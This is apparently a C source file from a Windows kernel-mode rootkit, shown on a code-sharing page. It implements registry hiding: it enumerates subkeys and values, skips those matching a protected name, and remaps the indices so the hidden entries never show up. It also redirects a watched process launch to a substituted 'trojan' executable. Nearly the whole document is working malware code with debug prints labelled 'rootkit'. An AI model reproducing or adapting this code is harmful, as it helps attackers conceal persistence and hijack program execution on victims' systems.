📄 rk_defense.c
字号:
if(track_reg->mRegMap)
{
memset(track_reg->mRegMap, 0, sizeof(MAP_REGVALUE));
}
}
p->mKeyData = ExAllocatePool(PagedPool, sizeof(TRACK_REGVALUE));
ASSERT(p->mKeyData)
if(p->mKeyData)
{
PTRACK_REGVALUE track_reg;
/* ______________________________________________________
. The TRACK_REGVALUE type stores a mapping of known good
. value indices to trojan indices
. ______________________________________________________ */
memset(p->mKeyData, 0, sizeof(TRACK_REGVALUE));
track_reg = ((PTRACK_REGVALUE)(p->mKeyData));
track_reg->mNumberOfValues = 0;
track_reg->mRegMap = ExAllocatePool(PagedPool, sizeof(MAP_REGVALUE));
ASSERT(track_reg->mRegMap)
if(track_reg->mRegMap)
{
memset(track_reg->mRegMap, 0, sizeof(MAP_REGVALUE));
}
}
}
}
ASSERT(p->mHandle)
ASSERT(p->mValueData)
ASSERT(p->mKeyData)
return p;
}
/* not threadsafe, make sure p isn't currently in global list */
void AddRegMapValuePair( PTRACK_HANDLE p, ULONG realIndex, ULONG trojanIndex )
{
PTRACK_REGVALUE track_reg = NULL;
ASSERT(p)
DbgPrint("rootkit: AddRegMapValuePair() %d %d\n", realIndex, trojanIndex);
if( (p)
&&
(p->mType & TRACKFLAG_REGVALUE)
&&
(p->mValueData) )
{
track_reg =((PTRACK_REGVALUE)(p->mValueData));
if(track_reg)
{
PMAP_REGVALUE rv = track_reg->mRegMap;
/* _____________________________________________
. we should currently have a RV head, the list
. head is not used, BTW
. _____________________________________________ */
ASSERT(rv)
while(rv)
{
/* add new regvalue mapping to end of list */
if(rv->mNext == NULL)
{
rv->mNext = ExAllocatePool(PagedPool, sizeof(MAP_REGVALUE));
ASSERT(rv->mNext)
if(rv->mNext)
{
memset(rv->mNext, 0, sizeof(MAP_REGVALUE));
DbgPrint("rootkit: adding new regmap\n");
rv->mNext->mRealIndex = realIndex;
rv->mNext->mTrojanIndex = trojanIndex;
ASSERT( NULL == rv->mNext->mNext)
break;
}
}
rv = rv->mNext;
}
}
}
}
/* not threadsafe, make sure p isn't currently in global list */
void AddRegMapKeyPair( PTRACK_HANDLE p, ULONG realIndex, ULONG trojanIndex )
{
PTRACK_REGVALUE track_reg = NULL;
ASSERT(p)
DbgPrint("rootkit: AddRegMapKeyPair() %d %d\n", realIndex, trojanIndex);
if( (p)
&&
(p->mType & TRACKFLAG_REGVALUE)
&&
(p->mKeyData) )
{
track_reg =((PTRACK_REGVALUE)(p->mKeyData));
if(track_reg)
{
PMAP_REGVALUE rv = track_reg->mRegMap;
/* _____________________________________________
. we should currently have a RV head, the list
. head is not used, BTW
. _____________________________________________ */
ASSERT(rv)
while(rv)
{
/* add new regvalue mapping to end of list */
if(rv->mNext == NULL)
{
rv->mNext = ExAllocatePool(PagedPool, sizeof(MAP_REGVALUE));
ASSERT(rv->mNext)
if(rv->mNext)
{
memset(rv->mNext, 0, sizeof(MAP_REGVALUE));
DbgPrint("rootkit: adding new regmap\n");
rv->mNext->mRealIndex = realIndex;
rv->mNext->mTrojanIndex = trojanIndex;
ASSERT( NULL == rv->mNext->mNext)
break;
}
}
rv = rv->mNext;
}
}
}
}
/* when a process is going to enumerate the values under a key, this function
. makes sure the hidden values are kept track of */
int SetupFakeValueMap( HANDLE pHandle, HANDLE hKey )
{
// for enumerating a subkey
PVOID pInfo;
ULONG ResultLength;
ULONG Size;
int index = 0;
int offset_index = 0;
int rc;
int numValuesToShow = 0;
int numSubkeysToShow = 0;
PTRACK_HANDLE p = 0;
ASSERT(hKey)
ASSERT(pHandle)
/* ___________________________________________________________
. a new key has been opened - we need to update data about it
. ___________________________________________________________ */
p = FindTrackHandle(hKey);
/* I've failed this assertion a couple of times - no crash - but weird */
ASSERT(NULL == p)
DbgPrint("rootkit: SetupFakeValueMap() with hKey 0x%X\n", hKey);
if(p) FreeTrackHandle(hKey);
p = CreateNewTrackHandle( hKey, TRACKFLAG_REGVALUE );
/* arbritrary */
Size = 216;
pInfo = ExAllocatePool(PagedPool, Size);
if (pInfo == NULL)
{
return -1;
}
/* _________________________________
. enumerate subkeys
. _________________________________ */
for(;;)
{
rc = ZwEnumerateKey(
hKey,
index,
KeyBasicInformation,
pInfo,
Size,
&ResultLength);
if( STATUS_SUCCESS == rc )
{
DbgPrint("rootkit: enum subkey index %d\n", index);
/* __________________________________________
. compare value name to our predefined
. protection string. If it matches, then
. make sure we have a trojan mapping for it.
. offset_index keeps track of value indexes
. that we have "skipped".
. __________________________________________ */
if( !wcsncmp(
((KEY_BASIC_INFORMATION *)pInfo)->Name,
gProtectStringW,
PROTECT_STRING_LENGTH))
{
DbgPrint("rootkit: detected protected subkey %s\n", gProtectString);
offset_index++;
}
else
{
numSubkeysToShow++;
}
AddRegMapKeyPair( p, index, (index + offset_index));
index++;
}
else
{
DbgPrint("rootkit: error %X\n", rc);
break;
}
}
index = 0;
offset_index = 0;
/* _________________________________
. enumerate values
. _________________________________ */
for(;;)
{
rc = ZwEnumerateValueKey(
hKey,
index,
KeyValueBasicInformation,
pInfo,
Size,
&ResultLength);
if( STATUS_SUCCESS == rc )
{
DbgPrint("rootkit: enum value index %d\n", index);
/* __________________________________________
. compare value name to our predefined
. protection string. If it matches, then
. make sure we have a trojan mapping for it.
. offset_index keeps track of value indexes
. that we have "skipped".
. __________________________________________ */
if( !wcsncmp(
((KEY_VALUE_BASIC_INFORMATION *)pInfo)->Name,
gProtectStringW,
PROTECT_STRING_LENGTH))
{
DbgPrint("rootkit: detected protected value %s\n", gProtectString);
offset_index++;
}
else
{
numValuesToShow++;
}
AddRegMapValuePair( p, index, (index + offset_index));
index++;
}
else
{
DbgPrint("rootkit: error %X\n", rc);
break;
}
}
ExFreePool((PVOID)pInfo);
/* update data about this handle */
if(p)
{
PTRACK_REGVALUE track_reg = ((PTRACK_REGVALUE)(p->mValueData));
DbgPrint("rootkit: adding track value!\n");
if(track_reg)
{
track_reg->mNumberOfValues = numValuesToShow;
}
track_reg = ((PTRACK_REGVALUE)(p->mKeyData));
if(track_reg)
{
track_reg->mNumberOfValues = numSubkeysToShow;
}
AddNewTrackHandle(p);
}
return 0;
}
HANDLE gFileHandle = 0;
HANDLE gSectionHandle = 0;
HANDLE gRedirectSectionHandle = 0;
HANDLE gRedirectFileHandle = 0;
/* ____________________________________________
. watch this file handle - if they attempt to
. launch a process - redirect it!
. ____________________________________________ */
void WatchProcessHandle( HANDLE theFileH )
{
NTSTATUS rc;
HANDLE hProcessCreated, hProcessOpened, hFile, hSection;
OBJECT_ATTRIBUTES ObjectAttr;
UNICODE_STRING ProcessName;
UNICODE_STRING SectionName;
UNICODE_STRING FileName;
LARGE_INTEGER MaxSize;
ULONG SectionSize=8192;
IO_STATUS_BLOCK ioStatusBlock;
ULONG allocsize = 0;
DbgPrint("rootkit: Loading Trojan File Image\n");
/* first open file w/ NtCreateFile
. this works for a Win32 image.
. calc.exe is just for testing.
*/
RtlInitUnicodeString(&FileName, L"\\??\\C:\\calc.exe");
InitializeObjectAttributes( &ObjectAttr,
&FileName,
OBJ_CASE_INSENSITIVE,
NULL,
NULL);
rc = ZwCreateFile(
&hFile,
GENERIC_READ | GENERIC_EXECUTE,
&ObjectAttr,
&ioStatusBlock,
&allocsize,
FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ,
FILE_OPEN,
0,
NULL,
0);
if (rc!=STATUS_SUCCESS) {
DbgPrint("Unable to open file, rc=%x\n", rc);
return 0;
}
SetTrojanRedirectFile( hFile );
gFileHandle = theFileH;
}
HANDLE CheckForRedirectedFile( HANDLE hFile )
{
if(hFile == gFileHandle)
{
DbgPrint("rootkit: Found redirected filehandle - from %x to %x\n", hFile, gRedirectFileHandle);
return gRedirectFileHandle;
}
return NULL;
}
void SetTrojanRedirectFile( HANDLE hFile )
{
gRedirectFileHandle = hFile;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -